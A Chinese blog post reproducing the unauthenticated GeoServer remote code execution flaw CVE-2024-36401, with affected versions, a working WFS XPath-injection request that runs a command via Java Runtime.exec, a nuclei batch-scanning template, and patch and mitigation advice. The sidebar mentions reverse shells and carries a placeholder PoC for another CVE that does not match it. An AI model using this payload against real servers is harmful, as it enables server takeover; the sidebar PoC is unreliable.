【漏洞复现】Geoserver远程代码执行漏洞(CVE-2024-36401)

最新推荐文章于 2025-07-01 16:17:29 发布
最新推荐文章于 2025-07-01 16:17:29 发布
阅读量5k 收藏 13
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 RCE Geoserver CVE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140145144

文章目录

漏洞描述

GeoServer是一个用Java编写的开源软件服务器,允许用户共享和编辑地理空间数据。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。

GeoServer存在远程代码执行漏洞(CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。

漏洞名称Geoserver远程代码执行漏洞
CVE编码CVE-2024-36401
漏洞类型代码执行
漏洞等级高危
公开时间2024-07-02

影响版本

GeoServer < 2.23.6

2.24.0 <= GeoServer < 2.24.4

2.25.0 <= GeoServer < 2.25.2

利用条件

无需任何利用条件

漏洞复现

POST /geoserver/wfs HTTP/1.1
Host: ip
Content-Type: application/xml
Content-Length: 339

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping dgrh3.cn -c 1")'>
 <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

在这里插入图片描述

批量脚本

id: CVE-2024-36401-GeoServer-wfs-rce

info:
  name: GeoServer 远程代码执行漏洞(CVE-2024-36401)
  author: whgojp
  severity: critical
  description: GeoServer 远程代码执行漏洞(CVE-2024-36401)

http:
- raw:
  - |-
    @timeout: 30s
    POST /geoserver/wfs HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/xml
    Content-Length: 324

    <wfs:GetPropertyValue service='WFS' version='2.0.0'
     xmlns:topp='http://www.openplans.org/topp'
     xmlns:fes='http://www.opengis.net/fes/2.0'
     xmlns:wfs='http://www.opengis.net/wfs/2.0'
     valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}}")'>
     <wfs:Query typeNames='topp:states'/>
    </wfs:GetPropertyValue>

  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol

修复建议

GeoServer已经发布先前版本的补丁,可以从下载页面(https://geoserver.org/)下载:2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0,从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件,替换掉WEB-INF/lib里面对应的文件即可。

临时缓解措施

删除GeoServer 中gt-complex-x.y.jar文件(x.y为GeoTools 版本,例如GeoServer 2.25.1中是gt-complex-31.1.jar),这将从 GeoServer 中删除漏洞代码,但可能会破坏某些 GeoServer 功能。

参考链接

https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
https://osgeo-org.atlassian.net/browse/GEOT-7587
https://github.com/vulhub/vulhub/pull/540/files#diff-f83989e1a9d69179df696bc01c04fbf62ba914325457bef67c1d95fb63772e91

漏洞复现CVE-2024-36401 Geoserver远程代码执行漏洞复现
渗透之路,攻防之间皆学问
10-24 3892
GeoServer存在远程代码执行漏洞CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。
Geoserver XPath表达式注入致远程代码执行漏洞复现(CVE-2024-36401)
0xSec
07-03 2469
2024年7月,互联网上披露Geoserver表达式注入致远程代码执行漏洞CVE-2024-36401),攻击者无需认证即可利用该漏洞获取服务器权限,建议受影响的客户尽快修复漏洞
GeoServer CVE-2024-36401 漏洞利用
泷羽Sec-静安
08-16 3338
GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。中数字的长度要和命令的字节数等于或大于才能执行成功,越大执行越慢。的报错是成功执行的。
Goby漏洞利用优化 | GeoServer远程代码执行漏洞CVE-2024-36401)(支持回显命令执行、内存马)
m0_46699477的博客
07-09 1164
GeoSverver 远程代码执行漏洞 CVE-2024-36401:GeoSverver Tools 库的 API 在处理要素类型的属性名称时,会将这些属性名称不安全地传递给 commons-jxpath 库进行解析,由于 commons-jxpath 库在解析 XPath 表达式时可以执行任意代码,从而导致未经身份验证的用户能够利用特定的 OGC 请求参数远程执行代码。
CVE-2024-36401 RCE漏洞,从零基础到精通,收藏这篇就够了!
QIANDXX的博客
05-30 323
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和。
Geoserver漏洞复现
2301_80115097的博客
04-23 2414
(https://github.com/geoserver/geoserver/)获取2.23.4或2.24.1及以上的版本修复漏洞。官网:https://sourceforge.net/projects/geoserver/files/GeoServer/下载地址:https://github.com/geoserver/geoserver/releases。仓库托管地址:https://github.com/geoserver/geoserver。默认账号密码:admin/geoserver
CVE-2024-36401 GeoServer远程代码执行
最新发布
haoyv147的博客
07-01 895
GeoServer调用的GeoTools库API,在解析特性类型的属性/属性名称时,以不安全的方式将它们传递给commons-jxpath库,当解析XPath表达式时可以执行任意代码。GeoServer 使用了某些类库(如 XStream)来反序列化 XML 请求,如果攻击者传入了精心构造的 XML Payload,GeoServer 将在处理过程中。此漏洞允许未经身份验证的攻击者远程执行任意代码,危及服务器的完整性与数据安全。这个请求触发了 XMLDecoder 执行,从而在服务器上运行了恶意命令。
GeoServer SQL 注入漏洞复现CVE-2024-25157)附poc_geoserverl漏洞
qd520_1314的博客
04-15 1910
在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。使用方法:python CVE-2023-25157.py http://your-ip:8080/geoserver/ows。在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数。1.访问http://yourip:8080/geoserver进入首页。2.获取每个功能名称。
GeoServer远程代码执行漏洞复现(CVE-2024-36401)
qq_26229345的博客
07-08 9076
文章仅供参考,本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责!
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 2422
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
GeoServer之xpath表达式远程代码执行CVE-2024-36401漏洞复现及分析
bring_coco的博客
11-15 1006
比如GetPropertyValue(获取属性值),GetFeatureWithLock(获取带锁特征),CreateStoredQuery(创建存储查询),DropStoredQuery(删除存储查询),ListStoredQueries(列出已存储的查询),DescribeStoredQuery(描述存储查询)尽管版本之间存在一些重要差异,但请求语法通常保持不变。检查缓存中是否存在xpath已编译的表达式,如果 expr 不为 null,表示缓存中已存在已编译的表达式,直接返回该表达式,否则会编译。
CVE-2024-36401GeoServer远程代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
07-08 8208
GeoServer是一个开源服务器,允许用户共享和编辑地理空间数据。在版本2.23.6、2.24.4和2.25.2之前存在一个远程代码执行漏洞,该漏洞源于GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码。该漏洞允许未经身份验证的用户通过针对默认GeoServer安装的特制输入进行远程代码执行
GeoServer 属性名表达式前台代码执行漏洞CVE-2024-36401
4SecNet团队专栏
09-29 484
GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据,遵循OGC开放标准的开源WFS-T和WMS服务器。在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。nuclei格式检测规则。python脚本扫描。
CVE-2024-36401-GeoServer命令执行漏洞测试
m0_61835385的博客
09-14 482
写一个用telnet的反弹shell脚本,保存为test.sh。用python的simplehttp起一个服务。客户机执行chmod +x test.sh。攻击机执行:nc -lvnp 端口。
【奇淫技巧】mysql注入小技巧(非常详细)零基础入门到精通,收藏这一篇就够了
A1_3_9_7的博客
03-17 937
举例:通过布尔盲注的方法注当前登录用户名的第一位(这里是"r",ascii编码后是114),通过截取user字段第一位与爆破位置的数字进行比较,如果爆破位置数字小于114,就会触发溢出数据库报错,如果>=114就会回显正常,所以这里可以判断当前登录用户名的第一位ascii编码后是114,是"r"。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
【靶机实战】GeoServer 远程代码执行漏洞复现
qq_21039641的博客
07-10 2217
CVE-2024-36401是一个高危的远程代码执行漏洞,存在于GeoServer软件中。GeoServer是一个用Java编写的开源服务器,用于共享和编辑地理空间数据。该漏洞允许未经身份验证的远程攻击者通过构造特定的请求,在服务器上执行任意代码,从而可能获取服务器的控制权。这个漏洞2024年7月2日被公开,影响多个版本的GeoServer,包括2.24.0至2.24.3以及2.25.0至2.25.1。
未公开 GeoServer开源服务器wfs远程命令执行漏洞复现(CVE-2024-36401)
小司机的奥拓
07-03 1358
资源分享包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。
0Day漏洞防御篇:GeoServer CVE-2024-36401远程代码执行漏洞
weixin_55163056的博客
07-08 1070
高危漏洞预警
GeoServer wms远程代码执行漏洞
weixin_43567873的博客
03-26 718
GeoServer wms远程代码执行漏洞
cve-2024 poc
12-29
关于CVE-2024系列漏洞的概念验证(PoC)代码,存在多个公开资源提供了不同漏洞的具体实现方式。 针对CVE-2024-38077这一特定编号下的Windows操作系统高危漏洞,有开源项目给出了Python脚本形式的攻击向量实例[^2]。该程序通过命令行参数指定目标主机地址来发起测试性质的操作请求: ```python import requests def cve_2024_38077_poc(target_ip): url = f"http://{target_ip}/vulnerable_endpoint" headers = {"User-Agent": "Mozilla/5.0"} try: response = requests.get(url, headers=headers) if response.status_code == 200 and 'specific_response' in response.text: print(f"[+] Target {target_ip} is vulnerable!") else: print("[!] Target does not appear to be vulnerable.") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description='Test for CVE-2024-38077') parser.add_argument('--target_ip', required=True, help='The IP address of the target machine.') args = parser.parse_args() cve_2024_38077_poc(args.target_ip) ``` 值得注意的是,在实际环境中应用此类代码前应当获得合法授权并仅限于评估系统安全性之目的;严禁用于未经授权的渗透活动或恶意企图。 此外还有其他几个值得关注的安全公告也涉及到2024年的CVE编号,比如GeoServer中存在的CVE-2024-36401以及Jenkins平台上的CVE-2024-43044等问题均发布了相应的检测手段和技术细节说明[^3][^4]。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值